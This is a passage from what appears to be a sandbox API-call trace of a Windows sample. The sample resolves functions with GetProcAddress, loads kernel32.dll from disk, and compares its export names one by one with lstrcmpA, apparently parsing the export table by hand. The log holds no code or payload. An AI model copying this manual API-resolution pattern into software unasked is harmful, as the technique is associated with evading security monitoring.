lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0082.811] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0082.811] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0082.811] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0082.811] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0082.811] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0082.811] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0082.811] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0082.812] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0082.812] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0082.812] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0082.812] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0082.812] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0082.812] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0083.069] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0083.069] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0083.069] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0083.069] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0083.070] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59db40 | out: hHeap=0x570000) returned 1 [0083.071] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0083.076] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x580950 | out: hHeap=0x570000) returned 1 [0083.081] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0083.082] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0083.082] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0083.082] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0083.082] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0083.082] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0083.085] GetProcessHeap () returned 0x570000 [0083.085] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x68) returned 0x578d80 [0083.086] GetProcessHeap () returned 0x570000 [0083.086] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x589020 [0083.087] GetProcessHeap () returned 0x570000 [0083.088] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x48) returned 0x5807c0 [0083.088] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0083.088] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0083.088] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0083.088] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0083.088] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0083.089] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0083.089] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0083.089] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0083.089] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0083.089] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0083.091] GetModuleFileNameA (in: hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0083.092] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0083.104] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0083.105] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0083.105] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0083.105] GetProcessHeap () returned 0x570000 [0083.105] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xac430) returned 0x59c5f0 [0083.209] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0083.209] ReadFile (in: hFile=0x134, lpBuffer=0x59c5f0, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x59c5f0*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0083.219] CloseHandle (hObject=0x134) returned 1 [0083.219] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0083.225] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0083.226] lstrcmpA (lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0083.226] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0083.226] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0083.226] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0083.226] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0083.226] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0083.226] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0083.226] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 1 [0083.226] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0083.226] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0083.226] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0083.226] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0083.226] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") returned 1 [0083.226] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0083.226] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0083.226] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomW") returned 0 [0083.226] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0083.226] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0083.226] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0083.226] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0083.226] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0083.226] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0083.227] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0083.227] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0083.227] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0083.227] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0083.227] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0083.227] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0083.227] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0083.227] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0083.227] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0083.227] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0083.227] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0083.227] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0083.227] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0083.227] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0083.227] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0083.227] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0083.227] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0083.227] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0083.227] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0083.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0083.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0083.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0083.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0083.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0083.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0083.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0083.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0083.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0083.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0083.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0083.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0083.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") returned 1 [0083.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0083.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0083.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0083.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0083.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0083.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0083.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0083.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0083.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0083.229] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0083.229] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0083.229] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0083.229] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0083.229] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0083.229] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0083.229] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0083.229] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0083.229] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0083.229] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0083.229] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0083.229] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0083.229] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0083.229] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0083.229] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0083.229] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0083.229] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0083.229] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0083.229] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0083.229] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0083.230] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0083.230] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0083.230] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0083.230] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0083.230] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0083.230] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0083.230] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtx") returned 1 [0083.230] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0083.230] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0083.230] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0083.230] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0083.230] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0083.230] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0083.230] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0083.230] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0083.230] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0083.230] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0083.230] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0083.230] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0083.230] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0083.230] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtx") returned 1 [0083.231] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0083.231] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0083.231] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0083.231] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0083.231] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0083.231] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0083.231] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0083.231] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0083.231] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0083.231] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0083.231] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0083.231] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0083.231] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0083.245] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0083.245] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0083.245] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0083.245] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0083.245] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0083.245] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0083.246] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0083.246] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0083.246] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0083.246] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0083.246] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0083.246] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0083.246] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0083.246] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0083.246] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0083.246] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0083.246] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0083.246] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0083.246] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0083.246] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0083.246] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0083.246] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0083.246] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0083.246] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0083.246] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0083.246] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0083.246] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0083.246] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomW") returned 1 [0083.246] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0083.246] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0083.247] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0083.247] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0083.247] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0083.247] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0083.247] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0083.247] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0083.247] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0083.247] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0083.247] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0083.247] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0083.247] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0083.247] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0083.247] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0083.247] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0083.247] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomA") returned 1 [0083.247] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0083.247] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0083.247] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0083.247] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0083.247] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0083.247] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0083.247] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0083.248] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0083.248] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0083.248] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0083.248] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0083.248] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0083.248] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0083.248] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0083.248] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0083.248] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0083.248] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0083.248] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0083.248] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0083.248] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0083.249] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0083.249] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0083.249] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0083.249] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0083.249] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0083.249] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0083.249] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0083.249] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0083.249] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0083.249] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0083.249] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0083.249] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0083.249] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0083.249] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0083.249] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0083.250] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0083.250] lstrcmpA (lpString1="AllocConsole", lpString2="AdjustCalendarDate") returned 1 [0083.250] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0083.250] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0083.250] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0083.250] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0083.250] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0083.250] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0083.250] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0083.250] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0083.250] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0083.250] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0083.250] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0083.250] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0083.250] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0083.250] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0083.250] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0083.250] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0083.250] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0083.250] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0083.250] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") 